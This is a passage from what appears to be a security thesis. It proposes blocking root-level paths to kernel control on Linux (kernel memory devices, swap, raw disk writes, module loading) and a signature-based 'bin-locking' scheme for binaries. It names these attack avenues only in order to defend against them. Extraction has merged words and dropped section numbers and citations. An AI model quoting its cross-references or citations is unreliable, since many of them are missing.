Many have decided to abandon hope in securing the kernel from within, declar-ing it instead as intrinsically insecure and electing to use the hypervisor levelto implement security mechanisms designed to protect the kernel (see SectionThe hypervisor is also used to provide isolation between the kernel andunderlying hardware. The aim of isolating the underlying hardware from theoperating system has yielded benefits in virtualization and server consolida-tion, allowing one physical machine to run multiple operating system instancessimultaneously. The aim of protecting the operating system against attack byapplications using virtualization, however, to date has only been discussed inacademic circles (to our knowledge).
In the spirit of a guardian enforced mandatory access control policy, we re-
call the execute disable flag introduced to combat code injection buffer overflowattacks (discussed in Section The solution worked not because it wasthe most complete (it was not, it only worked at a page level and only protectedagainst code injection buffer overflow attacks), but because it was simple andwidely deployed. Instead of depending on an entirely new protection level toprotect the kernel, we focus on cutting off the obvious methods through a fewsimple mechanisms, forcing malware to exploit a vulnerability (which is muchharder) in order to gain access. Any of the more complete methods discussedin Section can be used in combination with the protection mechanisms wepropose in Section for a defence in depth approach.
Chapter 4. Limiting Privileged Processor Permission
Detection versus Prevention
In enforcing the separation between root and privileged processor control on asystem, we prevent many current kernel level rootkits from working on a sys-tem. While there are many actions that can be taken once a kernel rootkit hasprivileged processor permission the ways of getting that permis-sion are very few.
The other approach that can be taken toward addressing kernel rootkits is
to attempt to detect them either as they access the interfaces to gain privilegedprocessor control, or once they are in the kernel. Detection, however, is areactive protection method. We believe that when possible, it is much betterto prevent the threat from occurring rather than to attempt to detect it. Inour case, the ability for rootkits to gain privileged processor control can beprevented, and hence detection approaches may not be necessary. Preventionapproaches work best when the interface is not commonly used by legitimatesoftware (which in this case is true, as discussed in Section We discuss themany methods that have been proposed to detect against privileged processorcontrol rootkits in Section
Restriction of Raw Disk Writes
The additional protection mechanism most likely to affect end users (or the ap-plications they are likely to run) is that of disallowing raw writes to partitionsbeing actively used by the OS kernel (including both swap and file-system par-titions). This protection mechanism is necessary to prevent applications frombypassing the standard file access controls which have been imposed by the OSkernel. It also prevents swap from being written to as a method for modifyingcode run with privileged processor permission.
There are a number activities that are performed on all systems using the
raw disk interface provided by the OS kernel. We now discuss each of theseand how they are affected by disallowing raw writes.
1.
Disk Partitioning - Disk partitioning involves allocating areas of a disk
for use by different file-systems. Creating and modifying disk partitionsrequires write access to the underlying raw device by the partitioning soft-ware. This operation is inherently dangerous, and can be very destructiveto data on the partitions. Regardless of the protection mechanisms pro-posed in this thesis, modifying the partition table of a drive which is cur-rently mounted is still very dangerous. We therefore see restricting themodification of partitions on drives which are mounted as beneficial.
2.
Partition Formatting - Formatting involves creating a new file-system
on a partition created as discussed above. Creating a new file-systemon a partition which is currently being used by the OS kernel is neverrecommended, being likely to lead to both corruption and data loss, eitherin swap (if the partition is currently being used for swap space), or onthe file-system which was mounted at the time of the format operation.
Again, regardless of the additional protection mechanisms presented inthis thesis, formatting a mounted partition is a very dangerous.
3.
File-System Checks - A file system check involves checking the consis-
tency of a file-system, ensuring it is free of errors. As long as a file-systemcheck does not modify an active partition, the consistency check can beconsidered a relatively safe operation (and indeed would be allowed by thenew protection mechanism, since writes would not be performed). File-system checks that write to a mounted partition are inherently dangerousand should not be performed. Current approaches for checking a mountedfile-system involve requesting that all modifications be performed by thekernel, to avoid file-system corruption
In all cases above, the ability to perform raw disk access for writing com-
bined with the fact that the partition accessed is also being used by the ker-nel leads to a dangerous scenario. The ability to restrict raw disk writes tomounted partitions is beneficial, regardless of whether malware is involved. In-deed, users who try to perform a file-system check on a mounted partition oftenend up with corrupted data. We view the addition of a protection mechanism toaddresses these dangerous activities as advantageous.
By further limiting the interface between user and privileged processor control,
additional restrictions are introduced where previously developers were unre-
stricted. The restrictions, however, are being placed on aspects of the system
very seldom (if ever) used by an end-user or the applications they are likely
to run. Kernel debuggers, one application broken by the restrictions on being
able to write to privileged kernel memory, are very unlikely to be run by end
users. For the small subset of users who
must use kernel debuggers or modify
the raw file-system without rebooting, the protection mechanisms discussed in
this chapter are not appropriate. Most end users, however, do not need to use
kernel debuggers. End-users are also accustomed to having to reboot when
partitioning disks, formatting, or repairing file-systems.
Chapter 4. Limiting Privileged Processor Permission
Raw Disk Access
While the inability to perform raw disk access may be viewed as a limitation ofour system, we actually view it as a benefit as discussed in Section
A Prototype Implementation
To test the feasibility of better enforcing the protection barrier between rootlevel and privileged processor control, we implemented the protections dis-cussed in Section This included preventing raw disk access on partitionsthat were mounted, disallowing kernel module loading, and restricting accessto physical memory interfaces. Our prototype implementation used Debian 4.0for applications and Linux kernel version 2.6.25 modified to enforce the addi-tional protection mechanisms.
The boot process was modified on the test system to initialize kernel data
structures that limit raw writes (to both mounted partitions and the swap parti-tion). For memory access, /dev/kmem was disabled and /dev/mem was restrictedto only allow writing to areas of physical memory not occupied by RAM. In analternate prototype, which we discuss in detail in Chapter we test preventingmodification of the kernel or associated modules on disk.
Restricting memory access
In the prototype Linux kernel, we enabled the pre-existing kernel options forrestricting access to /dev/kmem and limiting the memory writable through/dev/mem We disabled the running of arbitrary new kernels by omittingthe kexec system call (CONFIG_KEXEC was set to 'n' in the kernel configuration).
Restricting Kernel Module Loading
In the prototype Linux kernel, we disabled kernel module loading, since ourgoal was in determining whether everyday user activities would be influencedby the increased kernel protection mechanisms. An alternate approach is torestrict kernel module loading based on signatures, as already discussed andimplemented by Kroah-Hartman
4.5. A Prototype Implementation
Disabling Raw Disk Access
To test the restriction of raw writes to mounted partitions, we modified theprototype Linux kernel. We export a new syscontrol from the modified kernel,allowing a user space process to set which partitions should prevent (disable)raw disk writes. A syscontrol is a single pseudo-file (a file which does not existon disk) that exposes kernel configuration to user space. In this case, the list ofprotected partitions can be read by user-space applications, and a new partitioncan be appended to the list by writing to the pseudo-file. Because the syscontrolonly supports appending to the list maintained by the kernel, the only way toremove a partition from the list is to reboot the system, clearing the list. Aspart of the boot-up process, the list of partitions for which raw disk access isdisabled is written back into the syscontrol (after the initial fsck/file-systemcheck). This list of partitions written to the syscontrol in the prototype includedthe swap partition (to prevent attacks against kernel memory If anypartition on a disk is being protected, the prototype kernel also disables rawwrites to the file representing the entire drive. In order for malware to enableraw disk writes, it must modify the start-up process to disable initialization ofthe syscontrol and reboot the system. While we discuss protecting the startupprocess in Chapters and we note that this avenue for attack is specific toour prototype implementation, not a general problem with disabling raw diskwrites.
In the implementation, the restriction on raw disk writes was implemented
as a user-specified list. As an improvement, the file-system code in the Linuxkernel could be modified to automatically prevent raw writes as the partition ismounted.
Protection Against Current Rootkits
To verify that the prototype system was able to defend against OS kernel rootkitmalware, we attempted to install several Linux We selected twokernel-based rootkits (suckit2 and mood-nt), attempting to install them on thesystem using the provided install programs. Both failed to install because ofdisabled write access to /dev/kmem. The fact that both rootkits depended on/dev/kmem gives weight to disabling access to kernel memory. We believe ad-ditional mechanisms proposed in this chapter raise the bar significantly for anattacker attempting to compromise the kernel.
The prototype discussed in this chapter was implemented as a component of
Chapter 4. Limiting Privileged Processor Permission
the ∼ 2000 line bin-locking kernel module discussed in The performanceoverhead the kernel module, including bin-locking, is discussed more in Section
Effect on Applications
During development and use of the prototype (including watching videos, lis-tening to music, browsing the web, reading e-mail, and writing a paper we did not encounter any programs that were blocked by the other kernel in-terface restrictions implemented in the prototype. We did not encounter anyprogram (other than malware) which attempted to write directly to swap orkernel memory.
Related Work
We now discuss related work.
SELinux Reference Policy
We start our discussion by examining the SELinux reference and itsmethod for protecting against each of the methods discussed in Section We note that because SELinux is a default-deny policy system, much of thepolicy itself focuses on granting permissions, rather than documenting why apermission is not granted. While many of the methods for gaining privilegedprocessor control are denied by the SELinux reference policy, it is becausethese permissions are not required in order for applications to run correctly.
1.
Physical Memory Access - In restricting access to kernel memory, the
reference policy groups together under the same permission access to thedevice nodes /dev/mergemem, /dev/oldmem, /dev/kmem, /dev/mem, and/dev/port. Applications such as kudzu (which detects and configures newand/or changed hardware on the system), vbetool (which communicateswith the video BIOS), and xserver (which provides the graphical inter-face in Linux) are all granted write access to these device nodes. Of thethree, kudzu has been deprecated by Red Hat and the other two
2We examined version 2.20090730, available from
4.6. Related Work
use the privilege to access the video card, leading to the possibility thatthe SELinux reference policy can be made finer-grained by focusing onproviding access to just the video card. The current status of each devicenode is as follows:
• /dev/kmem - Provides access to kernel memory. Enabled by the ker-
nel configuration option CONFIG_DEVKMEM (see Section and en-abled in the standard Debian (v5.0) build of the kernel.
• /dev/mem - Provides access to all system memory. Restricted to por-
tions of the memory address space not associated with RAM by en-abling the kernel option CONFIG_NONPROMISC_DEVMEM (which was re-named to CONFIG_STRICT_DEVMEM in kernel 2.6.27). This kernel op-tion is not set in Debian v5.0.
• /dev/mergemem - Used for combining identical physical pages of mem-
ory in an effort to reduce memory consumption. While the documen-tation of the Linux kernel was updated in 2.1.115 to include this de-vice node, the related code appears to never have been accepted intothe main Linux kernel tree. Mergemem does not appear to have beenactively maintained since January 1999.
• /dev/oldmem - Used by crashdump kernels to access the memory of
the kernel that crashed. Useful for debugging the kernel, and can bedisabled on production machines. Enabled by the CONFIG_CRASH_DUMPconfiguration option, but disabled on the standard Debian (v5.0) buildof the kernel.
• /dev/port - Provides access to I/O ports. Enabled by the kernel con-
figuration option CONFIG_DEVPORT, and enabled in the standard De-bian (v5.0) build of the kernel.
With physical memory access, the SELinux reference policy does not makethe distinction between kernels that have been compiled with the rawmemory options discussed in Section and those that have not. Be-cause SELinux operates at the object level, it relies on the objects them-selves being specific enough to limit permission correctly. Without re-strictions on where data can be written using /dev/mem, providing writeaccess to video memory has the side effect of providing write access tokernel memory.
2.
Kernel Modules - The ability to load kernel modules is granted to a sin-
gle program in the SELinux reference policy; insmod. The ability to runinsmod is then restricted, in effect preventing arbitrary kernel modules
Chapter 4. Limiting Privileged Processor Permission
from being loaded by restricting what subjects are allowed to execute theinsmod binary. In the reference policy, subjects with the bootloader_ttype are allowed to execute insmod.
3.
Swap - In the SELinux reference policy, the ability to access swap if it ex-
ists as a physical partition on the hard drive is limited to those programsallowed to perform raw writes to fixed disks. Of all the methods of ob-taining privileged processor control, being allowed to perform raw writesto the hard drive is the only one documented in the reference policy asallowing SELinux security protections to be bypassed.
If swap is a file instead of a partition, there are no specific rules in thereference policy for restricting write access to the active swap file. Wesuspect it is up to the individual deploying SELinux to ensure that theswap file can not be written to.
4.
Kernel Image - The ability to replace the kernel image on disk (and, in-
deed, the bootloader or kernel modules) is determined through a numberof different actions. To prevent the updating of the raw disk blocks corre-sponding to these files, the SELinux reference policy has rules for restrict-ing raw disk access (as discussed in point To prevent updating thesefiles at the file-system layer, the SELinux reference policy restricts writeaccess to the bootloader, kernel image, and kernel modules separately.
A subject given write access to the bootloader may not have necessarilyhave write access to the kernel modules. Replacing the running kernelimage by using kexec is not mentioned in the SELinux reference policy.
Within the SELinux reference policy, there is no overreaching privilege that,
if given to a process, allows that process to obtain privileged processor con-trol through some method. In following with the general SELinux philosophyof least privilege, the developers of the reference policy have attempted to re-strict, for each object and subject, the actions that subject can perform on theobject, without making it clear that allowing these actions allows arbitrary ad-ditional privileges because the subject can gain privileged processor control.
Microsoft's Windows Vista already implements many of the kernel access pro-tections discussed in this chapter, including restrictions on write access to rawdrive partitions, swap, and kernel memory The success of suchapproaches in the Windows environment provides strong evidence that such re-strictions are not inherently detrimental to typical system use. Our discussion
4.6. Related Work
focuses on providing a complete view of the required protection mechanismsthat must be implemented to protect the kernel from malware. We providesimilar protection in the Linux environment, which has traditionally provided amore open interface to developers. We also build on some of the mechanismsprovided by Windows, proposing a method for selectively allowing updates tothe kernel and module files on disk. We believe the mechanisms discussed inthis chapter provide important new protection within the Linux kernel whilestill allowing it to be open (any individual can still compile and use their ownkernel). The approach taken in this chapter relies on bin-locking (Chapter but can also be modified to rely on configd (Chapter Both bin-locking andconfigd rely on a secure kernel, which the work in this chapter supports.
Other Related Work
By far, the most common approach for detecting OS kernel level malware is tohave a detection mechanism installed at a different protection level (recall Fig-ure Copilot, discussed by Petroni et al. operates as a distinct systemdevice on the system. It monitors the OS kernel in an attempt to detect changesto static kernel elements such as privileged processor code. It also provides amechanism for partial restoration of changes made by malicious kernel rootk-its. Petroni et al. likewise use a system device to detect changes in theOS kernel, but concentrate on protecting dynamic data structures.
Wang et al. discuss an approach that attempts to detect software that
exists for the purpose of hiding certain resources on a system (i.e., ghostware).
It compares the results of examining certain aspects of a system from two differ-ent angles to determine if there are any differences. These snapshots of systemstate are taken at the same time. Their approach resides at the applicationprivilege level and examines the results returned by the high level OS kernelAPI to specific queries. A second set of requests performed to the low level OSkernel API is then queried and compared to the first to determine if there areany discrepancies. Like CoPilot above, this technique detects ghostware afterit has infected the OS kernel, not preventing the infection.
Kruegel et al. present an approach for detecting at load time whether
a kernel module is malicious through binary analysis. This approach is themost similar to the protection mechanisms proposed in this chapter in that itattempts to prevent the loading of malicious code. Running in the OS kernel,it also relies on the protections against swap and physical memory writes asdiscussed in Section This approach can be used instead of kernel modulesigning as a method to protect the running OS kernel against the insertion ofadditional code which runs with privileged processor permission.
Chapter 4. Limiting Privileged Processor Permission
Carbone et al. take a snapshot of memory allocated to the running ker-
nel and attempt to map all dynamic data contained within it. Using the mem-ory snapshot and the corresponding kernel source code, they create a directedgraph of memory usage within the snapshot. They then check function point-ers and detect hidden objects as a method for detecting kernel rootkits. Theapproach operates offline, and works to detect rather than prevent rootkits.
Several approaches have leveraged recent ad-
vances in virtual machine monitors (VMMs) to detect kernel malware. Theseapproaches leverage the VMM as a way of protecting the detection mechanismagainst malware which has managed to compromise the OS kernel while stillallowing complete analysis of the lower protection levels of the software stack.
Because the interface between the OS kernel and VMM is similar to that
between the VMM and underlying hardware, higher level knowledge about OSkernel structures must be reconstructed from what is seen at the hardwarelayer. Many approaches refer to this as introspection – rebuilding the state ofthe OS kernel at the VMM layer in order to obtain a higher layer understanding.
Because work involving VMMs assumes that it is not possible to secure theOS kernel, they are forced to examine the OS kernel from a higher protectionlevel. We believe that the protections discussed in this chapter show that it ispossible to separate the OS kernel from root level processes, re-establishingtrust in the kernel. In trusting the kernel, we allow many of the protectionmechanisms developed to be moved from the VMM back into the OS kernel,making introspection unnecessary.
One argument for declaring the OS kernel insecure is that there are many
bugs that allow applications to compromise the kernel. While it is true that thenumber of lines of code in a modern kernel is high, we do not believe the discov-ery of bugs to be sufficient justification for declaring the kernel unsecurable.
Indeed, research on finding and fixing software vulnerabilities through staticand dynamic analysis presents an opportunity for reducing these vulner-abilities. As hypervisors become more complex, it is increasingly likely theirsecurity will be equally affected by bugs.
In trusted computing platforms such as AEGIS the kernel's digital sig-
nature is verified by the boot-loader before it is loaded. Because the kernelcurrently exports interfaces which allow it to be updated by user-space appli-cations, a cryptographic hash of the kernel at boot time is insufficient to verifythe integrity of the currently running kernel. In order to verify that the runningkernel has not been modified, the integrity verification must include all appli-cations which have ever run on the system since boot We believe suchan approach is overly heavyweight compared to disabling privileged processoraccess on end-user desktops.
4.7. Final Remarks
Many of the elements presented in this chapter for restricting access to thekernel have previously been proposed individually in some form or another.
The combination of all these elements, however, provides what we believe tobe complete protection against root level processes being able to obtain priv-ileged processor control. Protecting the kernel against compromise is a goalshared by many other researchers, as evidenced by the large volume of re-search published on the topic. This chapter takes the approach of protectingthe kernel through prevention, rather than detection. In taking the avenue ofpreventing access to the kernel, we parallel the work of execute disable, usingprocessor features to prevent, rather than try to detect, an attack. The ap-proach discussed in this chapter does not rely on the end-user for enforcement,is enforced on all applications deployed for the system, and is implemented bya guardian (the OS developer). It therefore follows the thesis goal of provid-ing a guardian enforced mandatory access control mechanism which can bedeployed.
Bin-Locking: Selectively
Restricting Updates to Binaries
In this chapter, we describe a file-system protection mechanism designed tolimit modifications to binaries – library and executable files on disk. We focuson establishing a beachhead against malware by protecting binary files – a typeof file very rarely modified by a user. Our proposal, however, extends to othertypes of files not modified by the user of a system.
In current computing environments, software applications written by many dif-ferent authors all coexist on disk, being installed at various times by the user.
Each application normally includes a number of program binaries along withsome associated libraries. While the installation of a new application will nor-mally not overwrite previously installed binaries, permission to modify all bina-ries is common. Indeed, this raises a problem: Any application installer (or evenapplication) running with sufficient privileges can modify any other applicationon disk. Application installers are routinely given these privileges during soft-ware upgrade or install (i.e., almost all installers run as administrator or root,giving complete access to the system). Some applications even run with ad-ministrator privileges during normal operation due to a variety of reasons anddespite the best efforts and countless recommendations against this practiceover the years. The frequent running of applications (including their installers)as administrator leads to a situation in which a single application can modifyany other application binary on disk. Normally, applications do not abuse thisprivilege to modify the binaries belonging to other applications. Malware, how-ever, does not traditionally respect the implicit expectations followed by normalsoftware, and uses the ability to modify other binaries as a convenient installa-
5.2. The Protection Mechanism
tion vector. This situation is not new. Already in 1986, the Virdem virus was infecting executables in order to spread itself; more recently, rootkits have used binary modification to help escape detection.
The Protection Mechanism
Our approach is to associate a digital signature with each library file and ex-ecutable which is checked by the kernel when an update to the binary is at-tempted by software. No centralized (or other) public key infrastructure isinvolved, although an important design aspect is a relationship between thesignature on the new binary, and a public key embedded in the (old) binarybeing replaced. We use additional kernel protections to restrict modification ofthese signed binaries on a system. The core technology is based on a simpleapplication of code-signing or self-signed executables We use the termbin-locking (short for binary-locking) to refer to our proposal, to avoid confusionwith other code signing mechanisms. The proposed system allows binaries tobe transparently and securely upgraded, facilitating the application of securitypatches.
At the core of our proposal is a simple but well-planned use of digital sig-
natures, designed to protect a binary against unauthorized modifications. Torestrict who can modify (or replace) a binary on disk, we enforce one simpleprotection rule: A library file or executable on disk can only be replaced by alibrary or executable containing a digital signature verifiable using any publickey in the previously installed binary having the same file name. Binaries pro-tected by the bin-locking proposal have embedded within them a set of digitalsignatures along with a set of corresponding public We propose sup-porting a few standardized digital signature algorithms (the particular choiceis specified alongside and protected by the digital signature). The kernel, uponfinding a digital signature (in the bin-locking section of the binary), will restrictreplacement of the binary to those new binaries containing a digital signaturewhich can be verified using any key in the currently installed binary. If thesignature can be verified (or the currently installed binary is not bin-locked),then the replacement is allowed. Otherwise, the replacement is denied by thekernel and the original binary remains unmodified on disk. Only one signa-ture needs to be verified in order for the replacement operation to succeed.
Deployment is incremental – binaries not bin-locked can be replaced without
1The portion of the file holding the digital signature itself is not included in the range of the
signature, to prevent a recursive definition. The public key, however, is integrity-protected bythe signature.
Chapter 5. Bin-Locking
restriction (which is how most systems currently operate), but once a binary isbin-locked it must be replaced by a bin-locked binary. The proposed method isquite different than SDSI/SPKI We trust keys only in a very limitedsetting (for replacing a binary which was signed with the same key). We do notuse names or certificates.
Over time, inevitably, signing keys used for bin-locking will be lost or com-
promised. Both situations can be ameliorated by allowing, as an option, theembedding of multiple verification public keys in a binary file. If one corre-sponding private key is lost, the other(s) can be used to sign a subsequentversion of the file (which can also introduce new keys). We do not specify anyconditions on who or what controls the private keys corresponding to these ad-ditional verification public keys, but many options exist including communitytrusted organizations or trusted friends who function as backups. While wemandate no specific infrastructure for key revocation, pro-actively installinga new version of a file which does not allow future versions signed with theprevious key (i.e., which excludes the old verification public key(s) from thoseembedded in the new version) prevents a compromised key from being a threatindefinitely. Because each file can be signed with a different key, the effect of acompromised key can be limited. When or how frequently to change keys whichare not known to have been compromised is a question we do not focus on inthis thesis.
Trust Model
In the proposed system, it is assumed that a malware author does not havephysical access to the end-user machine and that malware does not have accessto the private signing keys, nor have kernel level control of the target The protection mechanism discussed in Chapter is suitable for protecting thekernel.
A Generic Approach
At its base, the bin-locking approach restricts updates to an object based onthe signature verification public keys embedded in the object. In our discus-sion thus far, we have restricted objects to be binary files because they are not
2We define the kernel (and hence kernel level control) to include only those aspects running
with elevated CPU privileges (ring 0 privileges on x86) – this definition of kernel does notinclude core system libraries installed alongside the operating system but run in user space.
5.2. The Protection Mechanism
commonly modified by users and have a defined structure. The bin-locking ap-proach, however, can be expanded to any type of object not modified by endusers. This includes data files used by an application (e.g., fonts and graphics).
Objects can also be complete application packages (including all the files con-tained within, but not user data files created with the application) – this is theapproach taken by Android discussed in Section
Interdependence on Signing Keys
The parts of the binary file signed in creating a bin-locked file include all struc-ture surrounding the signatures, including the bin-locking section headers, pub-lic key prefixes, public keys, and any other element except the actual digitalsignature. Because the data used to generate each digital signature includesall public keys contained in the file, a single public key or signature cannot bereplaced in a bin-locked file signed by multiple parties without other partieshaving to re-sign the file. This approach is necessary because a single match-ing signature is considered sufficient in updating a binary file. If a bin-lockedfile could be signed with an additional signature while still being legitimate forthose keys already embedded, an attacker could take control of a binary file byappending a new signature to an already bin-locked file.
To ensure that bin-locked files remain visible on the file-system, we must ensurethat a new file-system is not mounted over top of bin-locked files, and that afile-system containing bin-locked files is not unmounted unexpectedly. We firstrecognize that the mounting and unmounting of file-systems is not commonlyperformed (or at least does not affect core system directories) after systemboot. We therefore modify the kernel to prevent mounting and unmounting offile-systems on specific paths. In the prototype, the list of such paths to protectis fully customizable by the user or machine administrator, being set as part ofthe boot process (however once a path is specified, it cannot be removed fromthe list of specified paths). We discuss the specifics of the prototype in Section
To rule out an easy way to subvert the proposed protection mechanism, we
must also disable raw disk access to those partitions containing bin-locked bi-nary files. This was discussed in Chapter
If deleting application binaries were still allowed, the bin-locking system
would be rendered ineffective; the attacker could simply delete the binary and
Chapter 5. Bin-Locking
then install a new one. Therefore, in a system supporting bin-locking, signedapplication binaries may not be deleted. To delete bin-locked files in the pro-posed system, the bin-locking protections must be disabled. In the prototype,this requires a reboot into a kernel which does not enforce the protection mech-anism (see Section Previous work on providing a trusted interface (e.g.,see – one which cannot be subverted by malware – between the kerneland the user may help to eliminate the reboot requirement. One solution (notimplemented in the prototype) is to tie enforcement of bin-locking to whetheror not a hardware token is inserted (similar to a mechanism proposed by Butleret al. – as long as the hardware token is inserted, moves and deletes tosigned binary files would be allowed.
We believe previous proposals which attempt to limit changes to binaries ondisk all fall short for one of three reasons: they either detect changes afterthey have happened (making recovery hard), rely on the userto correctly validate every file modification (imposing usability issues), or stillallow applications to modify any file at all during install/upgrade Bin-locking addresses these three points and yields additional benefits as explainedin Sections to
No Central Key Repository or Infrastructure
The proposed system differs from other code-signing systems currently in usein that it does not attempt to tie the signature to an entity. It can verify thatthe new version of an application binary was created by the same author (ororganization) as the old version without knowing who the author is. Becausethe signature on a to-be-installed binary file is verified using the public keyembedded in the previous version of the same file (by file name) installed onthe system, there is no need to centrally register a key or involve any centralrepository. Thus, no central certification authority or public key infrastructure(PKI) is required. An application author can create a signing key-pair and beginusing it immediately. Furthermore, if desired, different keys can be used foreach file on a system, limiting the impact of a key compromise (as long asall private keys are not stored in one place the attacker gains access to, theattacker incurs a per-executable cost for replacing protected binaries). Becausethere is no dependence on a centralized trusted authority, development of new
software remains unrestricted. We make no effort to restrict the software whichcan be installed on a system, as long as that software does not modify already-installed binaries. Other digital signature schemes proposed in the past haverelied on a trusted central authority
Trusted Software Base Even After Compromise
The legitimate operating system and core applications are normally installedbefore malware attempts to infect a machine. We exploit this temporal prop-erty. Typical malware, because it is installed after the operating system (includ-ing core libraries and programs), is not capable (if the proposed system is inplace for operating system files) of changing any of the operating system files.
The operating system files, therefore, can be trusted to be unmodified. If ananti-virus system is installed before any malware, the anti-virus binaries canalso be automatically protected using the same mechanism. Core binaries on acompromised system can therefore be trusted, allowing much greater controlover an infected system without requiring a reboot to clean media. Further-more, this ability to reliably trust binaries on the system can make recoveryeasier Using the proposed system, anti-virus software can be protectedagainst modification and system binaries can be relied upon with confidencein their integrity, restricting the ability for malware to modify or filter the re-sults of such applications in an attempt to hide. In the case of forensic analysis,while administrators may still choose to reboot to known-clean media once theydiscover malware, the inability for malware to hide is likely to result in the ad-ministrator becoming aware of the problem earlier.
Incremental Deployability with Incremental Benefit
Kernels which do not yet support the bin-locking mechanism will treat signedbinary files as normal binary files, since the modifications made to a binary tosupport bin-locking are backwards compatible. Similarly, binaries without bin-locking digital signatures are allowed on a kernel which supports the proposal(in contrast to most proposed code signing schemes Either the kernel orlibraries can be updated to support bin-locking first without an adverse affecton non-supporting systems.
Chapter 5. Bin-Locking
Low overhead
As will be discussed in Section the prototype has performance impactwhich is imperceptible to the end-user.
The bin-locking proposal is relatively simple to understand and does not re-quire any additional hardware or co-processors. Because it is simple, develop-ers are more likely to understand the protection mechanism. Also, the user isnot involved in enforcing the protection mechanism, eliminating the risk of thesecurity mechanism failing due to end-user error.
We now discuss some limitations related to deploying the proposed system. Wenote that many of these deficiencies can be addressed by combining the bin-locking approach with configd, as discussed in Chapter
Denial of Service
Any attempt to install an application after malware is already on the systemand has written bin-locked binaries (with different signatures) to the file namesrequired by the application will result in a failed install. While this "limitation"may be viewed as an advantage from a security viewpoint, not all users willfind that this improves usability. Currently, many users continue to use a com-puter after it has been infected with malware. They either are not aware thatmalware is there, or are not aware of the full implications of malware beingon the system. Malware initiating such a denial of service attack will illicit aforced user response when an application install is prevented. At this point intime, the desire of the user to install an application is a security benefit in en-couraging them to clean their system and remove the malware, including thefiles which resulted in the denial of service. We note that in order to take ad-vantage of their desire to install an application, the process of removing themalware (including the reboot required in the prototype system) must be assimple as possible; the usability impact of this makes the proposal more suit-able for some user environments than others, for example, for expert users, orusers supported by technical experts.
The same user response is forced by malware performing a denial of service
through filling the hard drive with bin-locked files which cannot be deleted(without a reboot). Both malware actions result in a state where the user (ortheir technical support team) is aware and forced to take action on installedmalware. For malware that wishes to hide, it seems unlikely that either denialof service will be actively exploited.
Signed Binary Moves and Deletes
With the bin-locking system in place, file deletion and movement become muchmore complex. We cannot allow a bin-locked file to be easily moved or deletedsince this would open up a method for allowing file replacement. We note,however, that application (and operating system) binaries seem to be rarelymoved or deleted on a system. Furthermore, we believe (and personal expe-rience seems to support) that users rarely uninstall applications. Statisticsfrom the Debian popularity contest project indicate that for many applications,a large percentage of the people who have installed the application have notused it within the past month (e.g., 95.358% of people who have installedtuxkart have not used it in over a month according to data collected on March6, 2010). For those times where an uninstall or move is required, a rebootinto a different kernel would allow the operations to be performed. Again, weacknowledge that the usability impact of this makes the proposal in its presentform more suitable for some user environments than others. We discuss rebootsas they relate to the prototype implementation in Section
The proposed protection mechanism only protects binaries on disk. If mal-ware can prevent the correct binary on disk from being invoked, then it maystill take precedence over legitimate programs. As an example, running the pscommand from the prompt without a pre-pended path (i.e., fully qualified filename) will cause the first copy of ps found to be run (even though it may notbe the /bin/ps binary). While the bin-locking scheme is designed primarily toprotect binaries against modification, bin-locked binaries provide no additionalprotection if they are not invoked. We must ensure therefore on an infectedsystem that the legitimate binary can be easily run instead of one found ata location of the attacker's choice. Additional copies of binaries installed bymalware can be avoided by running bin-locked applications directly, avoiding
Chapter 5. Bin-Locking
environment variables such as PATH. There are a number of methods for ac-complishing this, including calling the kernel directly (e.g. using the execvesystem call) to run a program. Because much of the aliasing functionality is im-plemented by libraries likely to be protected by the bin-locking scheme, somealiasing vulnerabilities can be avoided (e.g., by restricting PATH to include onlycore system directories when running as root).
While we want developers to use bin-locking for the applications they build,developer systems are not the design target of the developed applications. Wediscuss several developer features which currently remain enabled on all sys-tems and undermine the security of bin-locking. We propose disabling thesefeatures on systems using bin-locking (e.g., end-user desktops) in order to in-crease security. We believe that typical end-users (as opposed to developers)will not be bothered by the following restrictions.
1. Ptrace hooks are used by developers to debug a running appli-
cation. By allowing reads and writes to a process memory space, arbi-trary changes to both data and code within the running application can bemade. In order to ensure bin-locked binaries are run unmodified, ptraceaccess needs to be disabled for bin-locked binaries.
2. The customization of binaries by third parties is made much more difficult
by bin-locking. The modification of binaries by third parties, however, isexactly the type of attack that bin-locking aims to prevent. Bin-lockingensures the software run by end-users is never modified by anyone otherthan those who developed the software. Developers wishing to switch be-tween original software and custom builds (e.g., during debugging) willnot be able to take advantage of the benefits of bin-locking for those bina-ries.
3. Preloaders on Linux such as LD_PRELOAD allow additional libraries not
specified in an executable to be linked in at run-time. The use of pre-loaders thus provides a method for modifying a binary at run-time. Thereare two ways of preventing this from being exploited by attackers. Thefirst (and easiest) is to disable LD_PRELOAD on non-developer machines(e.g., by installing a bin-locked /lib/ld-linux.so.2 not implementingthe feature). The second defence against LD_PRELOAD comes through rec-ognizing that it must be processed (indirectly) by the binary during start-up. If the LD_PRELOAD environment variable is ignored or reset to a known-
5.5. Extensions to the Core Approach
good value (e.g., the empty string), the attack vector is disabled. Whilemost applications leave the functionality intact (i.e., by calling the default/lib/ld-linux.so.2), the application developer can disable the function-ality on binaries they intend to bin-lock.
Extensions to the Core Approach
Assuming a kernel supporting bin-locking has the basic capability of verifyingthat binary updates are authorized, other extended functionality may be worthconsidering. While we did not implement the following extensions in the proto-type, we believe them to be useful extensions to the core idea; those discussedhere would require additional support from the kernel.
As one possible extension to the system, version numbers could be embeddedin both the old and new binaries. If the kernel limits replacement based on ver-sion number, the same public-private key pair could be used over an extendedperiod of time without the risk of a downgrade attack (i.e., replacing a morerecent binary with an older version containing a vulnerability). While authors(or organizations) can achieve the same effect by "revoking" keys (as discussedat the top of Section versioning allows the software author to minimizethe number of public keys which must be contained in any new version of thebinary while still ensuring that the binary can replace many previous versions.
We acknowledge that rollback by legitimate users (the process of reverting soft-ware to a previous version) may not be possible while bin-locking enforcementis active on a system (since bin-locking, as outlined in this thesis, is designed toalso prevent downgrade attacks).
In the core idea, any binary which can be validated using signature verificationpublic keys in the installed binary will be allowed to replace the installed binary.
To prevent one binary from replacing another binary with different functional-ity written by the same organization (preventing their software from workingproperly), the organization could use a non-overlapping set of keys for eachbinary. As an extension to the basic bin-locking idea, an organization could
Chapter 5. Bin-Locking
embed an index number into each binary they sign. New versions of the samebinary would have the same index number; binaries for different applicationsdeveloped by the same organization would have different index numbers. If thekernel enforces that the index number between the old and new binary mustmatch, an organization could use the same private signing key for all their bi-naries (without allowing their binaries to be maliciously switched on a system).
As an example, sub-keying could be used to prevent the contents of rm frombeing used in an update to ls while allowing the two binaries to be signed withthe same key.
All Key Verification
